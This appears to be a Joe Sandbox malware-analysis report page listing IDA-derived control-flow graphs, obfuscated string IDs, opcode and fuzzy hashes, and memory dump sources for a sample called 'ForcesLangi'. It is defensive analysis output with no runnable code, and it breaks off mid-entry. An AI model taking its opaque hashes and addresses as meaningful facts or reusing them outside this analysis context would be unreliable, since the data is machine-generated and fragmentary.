                                                                                                                                                                                                                                              control_flow_graph 2015 6ce27100-6ce27111 2016 6ce27118-6ce27123 2015->2016 2017 6ce27857-6ce278a0 2016->2017 2018 6ce27129-6ce27136 2016->2018 2019 6ce27974 2017->2019 2021 6ce27344-6ce273b2 2018->2021 2022 6ce2713c-6ce27149 2018->2022 2019->2016 2021->2019 2024 6ce27925-6ce2792c 2022->2024 2025 6ce2714f-6ce2715c 2022->2025 2024->2019 2027 6ce27162-6ce2716f 2025->2027 2028 6ce2754e-6ce27595 2025->2028 2030 6ce27500-6ce27549 2027->2030 2031 6ce27175-6ce27182 2027->2031 2028->2019 2030->2019 2033 6ce276c2-6ce27730 2031->2033 2034 6ce27188-6ce27195 2031->2034 2033->2019 2036 6ce27670-6ce27677 2034->2036 2037 6ce2719b-6ce271a8 2034->2037 2036->2019 2039 6ce274a6-6ce274ef 2037->2039 2040 6ce271ae-6ce271bb 2037->2040 2039->2019 2042 6ce271c1-6ce271ce 2040->2042 2043 6ce272fb-6ce2733f call 6ce2f3e0 2040->2043 2046 6ce271d4-6ce271e1 2042->2046 2047 6ce277a8-6ce2782b call 6ce2fb2c 2042->2047 2043->2019 2051 6ce271e7-6ce271f4 2046->2051 2052 6ce2794c-6ce27953 2046->2052 2047->2019 2055 6ce27931-6ce2793b 2051->2055 2056 6ce271fa-6ce27207 2051->2056 2052->2019 2055->2019 2058 6ce2742a-6ce274a1 2056->2058 2059 6ce2720d-6ce2721a 2056->2059 2058->2019 2061 6ce27220-6ce2722d 2059->2061 2062 6ce2784b-6ce27852 2059->2062 2064 6ce27233-6ce27240 2061->2064 2065 6ce27940-6ce27947 2061->2065 2062->2019 2067 6ce27246-6ce27253 2064->2067 2068 6ce27605-6ce2766b 2064->2068 2065->2019 2070 6ce278a5-6ce27920 call 6ce2fb2c 2067->2070 2071 6ce27259-6ce27266 2067->2071 2068->2019 2070->2019 2075 6ce27830-6ce27839 2071->2075 2076 6ce2726c-6ce27279 2071->2076 2078 6ce273b7-6ce27425 2076->2078 2079 6ce2727f-6ce2728c 2076->2079 2078->2019 2081 6ce27292-6ce2729f 2079->2081 2082 6ce27735-6ce277a3 2079->2082 2084 6ce272a5-6ce272b2 2081->2084 2085 6ce27958-6ce2796d call 6ce2fb2c 2081->2085 2082->2019 2088 6ce272b8-6ce272c5 2084->2088 2089 6ce2767c-6ce276bd 2084->2089 2085->2019 2092 6ce272cb-6ce272d8 2088->2092 2093 6ce2783c-6ce27846 2088->2093 2089->2019 2095 6ce2759a-6ce27600 2092->2095 2096 6ce272de-6ce272eb 2092->2096 2093->2019 2095->2019 2098 6ce272f1-6ce272f6 2096->2098 2099 6ce274f4-6ce274fb 2096->2099 2098->2019 2099->2019
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 6CE27968
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ___std_exception_copy
                                                                                                                                                                                                                                              • String ID: 9&QN$Vxsi$Vxsi$v=z$}:$}:
                                                                                                                                                                                                                                              • API String ID: 2659868963-2183748173
                                                                                                                                                                                                                                              • Opcode ID: 9366cfeff818ebae47d58a834db2ef1f95c1b90d0d8f8f3467b70c00851f5418
                                                                                                                                                                                                                                              • Instruction ID: 8855f6694e0f4b4b3687ce0f82a14031bb1d5240638f254261b294506ffd7ddf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9366cfeff818ebae47d58a834db2ef1f95c1b90d0d8f8f3467b70c00851f5418
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72222776A416118FDF08CE7CC4D53DE37F2AB47324F21A619D822EB7A5C62E490ADB14
                                                                                                                                                                                                                                              Function 6CE18000 Relevance: 11.3, Strings: 8, Instructions: 1306COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2128 6ce18000-6ce18022 2129 6ce18029-6ce18034 2128->2129 2130 6ce18d36-6ce18d9c 2129->2130 2131 6ce1803a-6ce18047 2129->2131 2132 6ce19229 2130->2132 2134 6ce19188-6ce1918f 2131->2134 2135 6ce1804d-6ce1805a 2131->2135 2132->2129 2134->2132 2137 6ce18060-6ce1806d 2135->2137 2138 6ce191af-6ce191bc 2135->2138 2140 6ce18073-6ce18080 2137->2140 2141 6ce18b49-6ce18b50 2137->2141 2138->2132 2143 6ce18086-6ce18093 2140->2143 2144 6ce18a19-6ce18a20 2140->2144 2141->2132 2146 6ce18e97-6ce18e9e 2143->2146 2147 6ce18099-6ce180a6 2143->2147 2144->2132 2146->2132 2149 6ce1893b-6ce18942 2147->2149 2150 6ce180ac-6ce180b9 2147->2150 2149->2132 2152 6ce191c1-6ce191cb 2150->2152 2153 6ce180bf-6ce180cc 2150->2153 2152->2132 2155 6ce180d2-6ce180df 2153->2155 2156 6ce1883f-6ce18888 2153->2156 2158 6ce180e5-6ce180f2 2155->2158 2159 6ce19216-6ce1921d 2155->2159 2156->2132 2161 6ce18506-6ce18598 2158->2161 2162 6ce180f8-6ce18105 2158->2162 2159->2132 2161->2132 2164 6ce18da1-6ce18de2 2162->2164 2165 6ce1810b-6ce18118 2162->2165 2164->2132 2167 6ce18947-6ce1895d 2165->2167 2168 6ce1811e-6ce1812b 2165->2168 2167->2132 2170 6ce18131-6ce1813e 2168->2170 2171 6ce189cd-6ce18a14 2168->2171 2173 6ce18144-6ce18151 2170->2173 2174 6ce18bee-6ce18c5c 2170->2174 2171->2132 2176 6ce18962-6ce189c8 2173->2176 2177 6ce18157-6ce18164 2173->2177 2174->2132 2176->2132 2179 6ce1816a-6ce18177 2177->2179 2180 6ce18b8c-6ce18b9b 2177->2180 2182 6ce1875d-6ce187a6 2179->2182 2183 6ce1817d-6ce1818a 2179->2183 2180->2132 2182->2132 2185 6ce18190-6ce1819d 2183->2185 2186 6ce191a3-6ce191aa 2183->2186 2188 6ce181a3-6ce181b0 2185->2188 2189 6ce1903b-6ce19048 2185->2189 2186->2132 2191 6ce18f76-6ce18fb7 2188->2191 2192 6ce181b6-6ce181c3 2188->2192 2189->2132 2191->2132 2194 6ce181c9-6ce181d6 2192->2194 2195 6ce1867b-6ce18682 2192->2195 2197 6ce186d5-6ce1874c 2194->2197 2198 6ce181dc-6ce181e9 2194->2198 2195->2132 2197->2132 2200 6ce1888d-6ce188e8 2198->2200 2201 6ce181ef-6ce181fc 2198->2201 2200->2132 2203 6ce18202-6ce1820f 2201->2203 2204 6ce18a5a-6ce18ac8 2201->2204 2206 6ce18215-6ce18222 2203->2206 2207 6ce1920a-6ce19211 2203->2207 2204->2132 2209 6ce18b55-6ce18b87 call 6ce12760 2206->2209 2210 6ce18228-6ce18235 2206->2210 2207->2132 2209->2132 2213 6ce18c61-6ce18ccf 2210->2213 2214 6ce1823b-6ce18248 2210->2214 2213->2132 2217 6ce18de7-6ce18e28 2214->2217 2218 6ce1824e-6ce1825b 2214->2218 2217->2132 2220 6ce18261-6ce1826e 2218->2220 2221 6ce18f03-6ce18f71 2218->2221 2223 6ce18274-6ce18281 2220->2223 2224 6ce1904d-6ce19096 2220->2224 2221->2132 2226 6ce18287-6ce18294 2223->2226 2227 6ce187ab-6ce187ec 2223->2227 2224->2132 2229 6ce1829a-6ce182a7 2226->2229 2230 6ce1917c-6ce19183 2226->2230 2227->2132 2232 6ce18ea3-6ce18eb0 2229->2232 2233 6ce182ad-6ce182ba 2229->2233 2230->2132 2232->2132 2235 6ce182c0-6ce182cd 2233->2235 2236 6ce18cd4-6ce18d25 2233->2236 2238 6ce182d3-6ce182e0 2235->2238 2239 6ce1909b-6ce190dc 2235->2239 2236->2132 2241 6ce182e6-6ce182f3 2238->2241 2242 6ce18fbc-6ce1902a 2238->2242 2239->2132 2244 6ce182f9-6ce18306 2241->2244 2245 6ce1859d-6ce18603 2241->2245 2242->2132 2247 6ce18d2a-6ce18d31 2244->2247 2248 6ce1830c-6ce18319 2244->2248 2245->2132 2247->2132 2250 6ce18eb5-6ce18efe 2248->2250 2251 6ce1831f-6ce1832c 2248->2251 2250->2132 2253 6ce19122-6ce1912f 2251->2253 2254 6ce18332-6ce1833f 2251->2254 2253->2132 2256 6ce18345-6ce18352 2254->2256 2257 6ce19194-6ce1919e 2254->2257 2259 6ce19222 2256->2259 2260 6ce18358-6ce18365 2256->2260 2257->2132 2259->2132 2262 6ce18687-6ce186d0 2260->2262 2263 6ce1836b-6ce18378 2260->2263 2262->2132 2265 6ce19143-6ce1916b call 6ce1a6d0 2263->2265 2266 6ce1837e-6ce1838b 2263->2266 2265->2132 2270 6ce18391-6ce1839e 2266->2270 2271 6ce18acd-6ce18b44 call 6ce1a390 2266->2271 2275 6ce190e1-6ce190fb call 6ce2e610 2270->2275 2276 6ce183a4-6ce183b1 2270->2276 2271->2132 2279 6ce19170-6ce19177 2276->2279 2280 6ce183b7-6ce183c4 2276->2280 2279->2132 2283 6ce183ca-6ce183d7 2280->2283 2284 6ce1902f-6ce19036 2280->2284 2286 6ce18a37-6ce18a55 call 6ce19a20 2283->2286 2287 6ce183dd-6ce183ea 2283->2287 2284->2132 2286->2132 2291 6ce183f0-6ce183fd 2287->2291 2292 6ce188ed-6ce18936 2287->2292 2294 6ce18403-6ce18410 2291->2294 2295 6ce18e2d-6ce18e92 call 6ce1a6d0 2291->2295 2292->2132 2299 6ce18a25-6ce18a32 2294->2299 2300 6ce18416-6ce18423 2294->2300 2295->2132 2299->2132 2302 6ce19134-6ce1913e 2300->2302 2303 6ce18429-6ce18436 2300->2303 2302->2132 2305 6ce18751-6ce18758 2303->2305 2306 6ce1843c-6ce18449 2303->2306 2305->2132 2308 6ce18ba0-6ce18be9 2306->2308 2309 6ce1844f-6ce1845c 2306->2309 2308->2132 2311 6ce18462-6ce1846f 2309->2311 2312 6ce18608-6ce18676 2309->2312 2314 6ce187f1-6ce1883a 2311->2314 2315 6ce18475-6ce18482 2311->2315 2312->2132 2314->2132 2317 6ce18488-6ce18495 2315->2317 2318 6ce190fe-6ce1911d 2315->2318 2320 6ce191d0-6ce19205 call 6ce1a390 2317->2320 2321 6ce1849b-6ce184a8 2317->2321 2318->2132 2320->2132 2325 6ce184b8-6ce18501 2321->2325 2326 6ce184ae-6ce184b3 2321->2326 2325->2132 2326->2132
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ;K;$;K;$=vhr$=vhr$M7($_-m.$_-m.$aIh
                                                                                                                                                                                                                                              • API String ID: 0-1460946245
                                                                                                                                                                                                                                              • Opcode ID: 668bcba1d2490bff6b3a4aebfa54b07c6ded58823126e6d6d4f7ba9ce4bcf189
                                                                                                                                                                                                                                              • Instruction ID: ef8de2d778062ece0079cf0524095dedb9022f8211e729ea76a7326208249fe3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 668bcba1d2490bff6b3a4aebfa54b07c6ded58823126e6d6d4f7ba9ce4bcf189
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EA2F43AF492458FCB14CEBCE5843DD7BF2AB47364F219516D429EBB54C63A990ACB00
                                                                                                                                                                                                                                              Function 6CE23C50 Relevance: 11.1, Strings: 8, Instructions: 1109COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2328 6ce23c50-6ce23c68 2329 6ce23c6f-6ce23c7a 2328->2329 2330 6ce24532-6ce24539 2329->2330 2331 6ce23c80-6ce23c8d 2329->2331 2332 6ce24bf4 2330->2332 2334 6ce24843-6ce24884 2331->2334 2335 6ce23c93-6ce23ca0 2331->2335 2332->2329 2334->2332 2337 6ce23ca6-6ce23cb3 2335->2337 2338 6ce24bd5-6ce24bdc 2335->2338 2340 6ce24229-6ce24230 2337->2340 2341 6ce23cb9-6ce23cc6 2337->2341 2338->2332 2340->2332 2343 6ce24bc9-6ce24bd0 2341->2343 2344 6ce23ccc-6ce23cd9 2341->2344 2343->2332 2346 6ce247f1-6ce247f8 2344->2346 2347 6ce23cdf-6ce23cec 2344->2347 2346->2332 2349 6ce23cf2-6ce23cff 2347->2349 2350 6ce2441e-6ce2443d call 6ce24c00 2347->2350 2353 6ce23d05-6ce23d12 2349->2353 2354 6ce2479e-6ce247ec call 6ce315b8 2349->2354 2350->2332 2358 6ce24662-6ce246a3 2353->2358 2359 6ce23d18-6ce23d25 2353->2359 2354->2332 2358->2332 2362 6ce24750-6ce24799 2359->2362 2363 6ce23d2b-6ce23d38 2359->2363 2362->2332 2365 6ce24a6e-6ce24ab7 2363->2365 2366 6ce23d3e-6ce23d4b 2363->2366 2365->2332 2368 6ce23d51-6ce23d5e 2366->2368 2369 6ce24517-6ce2452d 2366->2369 2371 6ce24be1-6ce24be8 2368->2371 2372 6ce23d64-6ce23d71 2368->2372 2369->2332 2371->2332 2374 6ce23d77-6ce23d84 2372->2374 2375 6ce24264-6ce2427a 2372->2375 2377 6ce23d8a-6ce23d97 2374->2377 2378 6ce2427f-6ce2428b call 6ce25430 2374->2378 2375->2332 2382 6ce24b6a-6ce24b76 call 6ce315b8 2377->2382 2383 6ce23d9d-6ce23daa 2377->2383 2378->2332 2382->2332 2386 6ce23db0-6ce23dbd 2383->2386 2387 6ce246f6-6ce2473f 2383->2387 2390 6ce23dc3-6ce23dd0 2386->2390 2391 6ce24ac8-6ce24acf 2386->2391 2387->2332 2393 6ce23dd6-6ce23de3 2390->2393 2394 6ce24b7b-6ce24b82 2390->2394 2391->2332 2396 6ce24412-6ce24419 2393->2396 2397 6ce23de9-6ce23df6 2393->2397 2394->2332 2396->2332 2399 6ce24bba-6ce24bc4 2397->2399 2400 6ce23dfc-6ce23e09 2397->2400 2399->2332 2402 6ce24ad4-6ce24b20 2400->2402 2403 6ce23e0f-6ce23e1c 2400->2403 2402->2332 2405 6ce23e22-6ce23e2f 2403->2405 2406 6ce24b9f-6ce24ba6 2403->2406 2408 6ce23e35-6ce23e42 2405->2408 2409 6ce24b4c-6ce24b59 2405->2409 2406->2332 2411 6ce2450b-6ce24512 2408->2411 2412 6ce23e48-6ce23e55 2408->2412 2409->2332 2411->2332 2414 6ce24942-6ce249a8 2412->2414 2415 6ce23e5b-6ce23e68 2412->2415 2414->2332 2417 6ce23e6e-6ce23e7b 2415->2417 2418 6ce247fd-6ce2483e 2415->2418 2420 6ce23e81-6ce23e8e 2417->2420 2421 6ce249fb-6ce24a69 2417->2421 2418->2332 2423 6ce240b2-6ce240bf 2420->2423 2424 6ce23e94-6ce23ea1 2420->2424 2421->2332 2423->2332 2426 6ce23ea7-6ce23eb4 2424->2426 2427 6ce24349-6ce24392 2424->2427 2429 6ce24235-6ce2425f 2426->2429 2430 6ce23eba-6ce23ec7 2426->2430 2427->2332 2429->2332 2432 6ce2453e-6ce245ac 2430->2432 2433 6ce23ecd-6ce23eda 2430->2433 2432->2332 2435 6ce23ee0-6ce23eed 2433->2435 2436 6ce24185-6ce241c6 2433->2436 2438 6ce24303-6ce24344 2435->2438 2439 6ce23ef3-6ce23f00 2435->2439 2436->2332 2438->2332 2441 6ce23f06-6ce23f13 2439->2441 2442 6ce248cf-6ce2493d 2439->2442 2444 6ce24112-6ce24180 2441->2444 2445 6ce23f19-6ce23f26 2441->2445 2442->2332 2444->2332 2447 6ce24b87-6ce24b8e 2445->2447 2448 6ce23f2c-6ce23f39 2445->2448 2447->2332 2450 6ce24889-6ce248ca 2448->2450 2451 6ce23f3f-6ce23f4c 2448->2451 2450->2332 2453 6ce23f52-6ce23f5f 2451->2453 2454 6ce24744-6ce2474b 2451->2454 2456 6ce23f65-6ce23f72 2453->2456 2457 6ce246a8-6ce246f1 2453->2457 2454->2332 2456->2427 2459 6ce23f78-6ce23f85 2456->2459 2457->2332 2461 6ce23f8b-6ce23f98 2459->2461 2462 6ce2461c-6ce2465d 2459->2462 2464 6ce24b25-6ce24b4b call 6ce2e610 2461->2464 2465 6ce23f9e-6ce23fab 2461->2465 2462->2332 2469 6ce23fb1-6ce23fbe 2465->2469 2470 6ce240c4-6ce2410d 2465->2470 2469->2414 2472 6ce23fc4-6ce23fd1 2469->2472 2470->2332 2474 6ce245b1-6ce24617 2472->2474 2475 6ce23fd7-6ce23fe4 2472->2475 2474->2332 2477 6ce24b93-6ce24b9a 2475->2477 2478 6ce23fea-6ce23ff7 2475->2478 2477->2332 2480 6ce24abc-6ce24ac3 2478->2480 2481 6ce23ffd-6ce2400a 2478->2481 2480->2332 2483 6ce24290-6ce242fe 2481->2483 2484 6ce24010-6ce2401d 2481->2484 2483->2332 2486 6ce24023-6ce24030 2484->2486 2487 6ce249ad-6ce249f6 2484->2487 2489 6ce24442-6ce2448b 2486->2489 2490 6ce24036-6ce24043 2486->2490 2487->2332 2489->2332 2492 6ce24bab-6ce24bb5 2490->2492 2493 6ce24049-6ce24056 2490->2493 2492->2332 2495 6ce24b5e-6ce24b65 2493->2495 2496 6ce2405c-6ce24069 2493->2496 2495->2332 2498 6ce241cb-6ce24224 2496->2498 2499 6ce2406f-6ce2407c 2496->2499 2498->2332 2501 6ce24082-6ce2408f 2499->2501 2502 6ce24490-6ce24506 2499->2502 2504 6ce24095-6ce240a2 2501->2504 2505 6ce24bed 2501->2505 2502->2332 2507 6ce24397-6ce2440d 2504->2507 2508 6ce240a8-6ce240ad 2504->2508 2505->2332 2507->2332 2508->2332
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: I nw$Z4l,$Z4l,$]wEu$]wEu$my$9R$9R
                                                                                                                                                                                                                                              • API String ID: 0-2567923771
                                                                                                                                                                                                                                              • Opcode ID: e691692839b2ac8d86fbf98ae317b603520a6e97ebf7649cee079891160059c8
                                                                                                                                                                                                                                              • Instruction ID: 0eb387f7cbbce6d65ddca9732c4cfdaf72fcbda984fa71cb73c3a922fd6ab1c2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e691692839b2ac8d86fbf98ae317b603520a6e97ebf7649cee079891160059c8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C882EA36A466429FCB08CE7CE5E13CD77F6AB57354F31911AB425DBB94C62E890ACB00
                                                                                                                                                                                                                                              Function 6CE1C3D0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 419COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 2510 6ce1c3d0-6ce1c411 2511 6ce1c418-6ce1c423 2510->2511 2512 6ce1c929-6ce1c930 2511->2512 2513 6ce1c429-6ce1c436 2511->2513 2515 6ce1c962 2512->2515 2516 6ce1c43c-6ce1c449 2513->2516 2517 6ce1c94f-6ce1c956 2513->2517 2515->2511 2519 6ce1c6bb-6ce1c729 2516->2519 2520 6ce1c44f-6ce1c45c 2516->2520 2517->2515 2519->2515 2522 6ce1c462-6ce1c46f 2520->2522 2523 6ce1c7a5-6ce1c80b 2520->2523 2525 6ce1c475-6ce1c482 2522->2525 2526 6ce1c85e-6ce1c89f 2522->2526 2523->2515 2528 6ce1c935-6ce1c94a call 6ce2f3ab 2525->2528 2529 6ce1c488-6ce1c495 2525->2529 2526->2515 2528->2515 2532 6ce1c49b-6ce1c4a8 2529->2532 2533 6ce1c90f-6ce1c924 call 6ce2f3ab 2529->2533 2537 6ce1c810-6ce1c859 2532->2537 2538 6ce1c4ae-6ce1c4bb 2532->2538 2533->2515 2537->2515 2541 6ce1c4c1-6ce1c4ce 2538->2541 2542 6ce1c799-6ce1c7a0 2538->2542 2544 6ce1c8a4-6ce1c90a 2541->2544 2545 6ce1c4d4-6ce1c4e1 2541->2545 2542->2515 2544->2515 2547 6ce1c4e7-6ce1c4f4 2545->2547 2548 6ce1c95b 2545->2548 2547->2533 2550 6ce1c4fa-6ce1c507 2547->2550 2548->2515 2552 6ce1c563-6ce1c5a9 2550->2552 2553 6ce1c50d-6ce1c51a 2550->2553 2552->2515 2555 6ce1c520-6ce1c52d 2553->2555 2556 6ce1c5fc-6ce1c670 call 6ce2f3ab 2553->2556 2560 6ce1c533-6ce1c540 2555->2560 2561 6ce1c5ae-6ce1c5f7 2555->2561 2556->2515 2563 6ce1c546-6ce1c553 2560->2563 2564 6ce1c72e-6ce1c794 2560->2564 2561->2515 2566 6ce1c675-6ce1c6b6 2563->2566 2567 6ce1c559-6ce1c55e 2563->2567 2564->2515 2566->2515 2567->2515
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d6$d6$string too long
                                                                                                                                                                                                                                              • API String ID: 0-1601816696
                                                                                                                                                                                                                                              • Opcode ID: 2175849c19c720148461ae0a52b9a824a39e0bf1da7715acc3bd9804d7ca28c4
                                                                                                                                                                                                                                              • Instruction ID: 0ed3e2521ef53303d1bcf52a26123a00abb299dbbb8d9bf41183bb8b1dc1fdb7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2175849c19c720148461ae0a52b9a824a39e0bf1da7715acc3bd9804d7ca28c4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDD148367486518FDF04DE7CC5D53EE37F2AB47324F31A6298862DBB95C22A590E8780
                                                                                                                                                                                                                                              Function 6CE1E8D0 Relevance: 10.4, Strings: 7, Instructions: 1645COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: `#bO$dY?+$dY?+$ojpl$ojpl$z[MX$z[MX
                                                                                                                                                                                                                                              • API String ID: 0-3788235473
                                                                                                                                                                                                                                              • Opcode ID: 88d98039ddcbede46f0fbcf0d765af0e6c7bb1bfd7e8f556b66e36ec034aad20
                                                                                                                                                                                                                                              • Instruction ID: 640f493af20b20ca235404da2836a2489d0ac94818d0e6bce4384c5ba14c3588
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88d98039ddcbede46f0fbcf0d765af0e6c7bb1bfd7e8f556b66e36ec034aad20
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BC20536A599058FCF088D7CC5D53CE7BF2AB47324F346619D422DBF95C22A994B8B80
                                                                                                                                                                                                                                              Function 6CE00FC0 Relevance: 8.4, Strings: 5, Instructions: 2126COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ;?"$?3.*$A$)h$|Yvm$|Yvm
                                                                                                                                                                                                                                              • API String ID: 0-1640716877
                                                                                                                                                                                                                                              • Opcode ID: 0330d599ecbbe9745307214433c8c685a551fe88023048d96be45f6f52854f9f
                                                                                                                                                                                                                                              • Instruction ID: f119b406e86f40ace0f545ad4bdcf968be7aa8da489785f185bb940ff019503d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0330d599ecbbe9745307214433c8c685a551fe88023048d96be45f6f52854f9f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9F2133AB402118FCF04CE7CC9D53C9B7F2AB57358F20815AD929DB795D639898A8F81
                                                                                                                                                                                                                                              Function 6CE19A20 Relevance: 8.2, Strings: 6, Instructions: 688COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
